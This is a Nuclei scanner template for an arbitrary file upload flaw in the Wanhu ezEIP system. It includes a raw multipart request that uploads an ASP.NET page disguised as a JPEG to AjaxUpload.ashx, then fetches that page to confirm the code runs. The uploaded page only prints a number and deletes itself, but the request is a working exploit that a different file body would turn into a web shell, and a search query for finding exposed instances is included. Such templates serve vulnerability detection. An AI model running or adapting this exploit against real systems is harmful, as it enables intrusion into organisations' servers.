http:
    - extractors:
        - group: 1
          internal: true
          json:
            - .Msg
          name: url
          part: body
          type: json
      matchers:
        - dsl:
            - status_code_2==200 && contains_all(body_2,'12321')
          type: dsl
      raw:
        - |
          POST /whir_system/Res/assets/js/fileinput/js/AjaxUpload.ashx HTTP/1.1
          Host: {{Hostname}}
          User-Agent: Moziilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
          Content-Type: multipart/form-data; boundary=----{{boundary}}

          ------{{boundary}}
          Content-Disposition: form-data; name="txt_file"; filename="{{filename}}.aspx"
          Content-Type: image/jpeg

          <%@ Page Language="C#"%><% Response.Write(111*111);System.IO.File.Delete(Server.MapPath(Request.Url.AbsolutePath)); %>
          ------{{boundary}}
        - |
          GET /uploadfiles/{{url}} HTTP/1.1
          Host: {{Hostname}}
id: wanhu-ezeip-ajaxupload-fileupload
info:
    author: pphua,nobody
    metadata:
        hunter-query: app.name="万户 ezEip"
        veified: true
    name: 万户ezeip ajaxupload.aspx任意文件上传，高版本访问shell会出现403
    reference:
        - none
    severity: critical
    tags:
        - wanhu
        - ezeip
        - fileupload
        - 万户ezEIP
variables:
    boundary: '{{to_lower(rand_base(20))}}'
    filename: '{{to_lower(rand_base(10))}}'
